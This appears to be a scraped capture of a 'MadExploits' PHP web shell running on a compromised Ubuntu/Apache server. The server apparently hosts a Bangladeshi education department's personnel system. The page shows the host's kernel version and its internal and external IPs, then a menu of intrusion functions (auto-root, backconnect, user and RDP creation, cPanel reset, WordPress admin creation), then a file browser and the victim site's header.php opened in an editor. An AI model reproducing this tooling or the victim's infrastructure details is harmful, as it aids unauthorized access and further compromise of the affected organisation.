Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 52.14.244.52
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
homepage /
[ HOME SHELL ]
Name
Size
Permission
Action
111111headermenu.php
14.97
KB
-rw-r--r--
footer.php
636
B
-rw-r--r--
header.php
4.61
KB
-rw-r--r--
headermenu.php
18.35
KB
-rw-r--r--
headerreport.php
818
B
-rw-r--r--
homepage.php
285
B
-rw-r--r--
homepage_editor.php
320
B
-rw-r--r--
left_menu.php
5.25
KB
-rw-r--r--
testfont.php
587
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> <link rel="shortcut icon" href="../images/logo.jpg" type="image/x-icon"> <!-- DatePiker--> <link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css"> <script src="https://code.jquery.com/jquery-1.12.4.js"></script> <!--<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script> <script src="https://code.jquery.com/ui/1.13.2/jquery-ui.js"></script> <script src="https://cdn.datatables.net/2.0.7/js/dataTables.js"></script> <script src="https://cdn.datatables.net/2.0.7/js/dataTables.jqueryui.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/dataTables.buttons.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/buttons.jqueryui.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/buttons.colVis.min.js"></script>--> <script src="https://code.jquery.com/ui/1.13.2/jquery-ui.js"></script> <script src="https://cdn.datatables.net/2.0.7/js/dataTables.js"></script> <script src="https://cdn.datatables.net/2.0.7/js/dataTables.jqueryui.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/dataTables.buttons.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/buttons.jqueryui.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.2.7/pdfmake.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pdfmake/0.2.7/vfs_fonts.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/buttons.html5.min.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/buttons.colVis.min.js"></script> <script src="https://cdn.datatables.net/buttons/3.0.2/js/buttons.print.min.js"></script> <!--Light Box--> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ekko-lightbox/5.3.0/ekko-lightbox.css"> <script src="https://cdnjs.cloudflare.com/ajax/libs/ekko-lightbox/5.3.0/ekko-lightbox.min.js"></script> <link rel="stylesheet" href="../css/header.css"> <link rel="stylesheet" href="../css/pagelayout.css"> <link rel="stylesheet" href="../css/headermenu.css"> <link rel="stylesheet" href="../css/login.css"> </head> <body style="font-family: cSoliman"> <div class="container"> <div class="row"> <div class="col-md-12 printable"> <table width="100%"> <tr> <td align="right"> <img src="../images/logo.png" class="img-responsive" alt="Logo" height="75" width="75"> </td> <td align="center"> <h3>শিক্ষা প্রকৌশল অধিদপ্তর </h3> <h4> শিক্ষা ভবন</h4> </td> <!-- <td align="left"><img src="../images/muzib100.png" class="img-responsive" alt="Logo" height="75" width="75"> </td>--> </tr> </table> </div> </div> </div> </div> <div class="text-right container" style="background-color:white"> <div class="row"> <div class="col-md-12"> <?php if(!empty($_SESSION['user_id'])) { echo "<font color=#ff0000 size=-1><b>"; echo $_SESSION['username'] ; echo ', ' ; echo $_SESSION['designation'] ; echo ', ' ; echo $_SESSION['OfficeName'] ; if(!empty($_SESSION['pimsid'])){ echo 'PIMS আইডি-'.$_SESSION['pimsid'] ; } ?> <span> <a href="../../index.php">লগ আউট</b></font></a></span> <?php } ?> </div> </div> </div> <div class="container backcolor noprint" style="padding-bottom: 5px;"> <div class="row"> <div class="col-md-12"> <img src="../images/logo.png" align="middle" height="65px" width="65px"> <span class="left" style="font-size: 25px;color:#7d48ec;font-family:cSoliman;"><b>ইইডি পার্সোনেল ইন্ট্রিগ্রেটেড ম্যানেজমেন্ট সিস্টেম</b></span> </div> </div> </div>
Close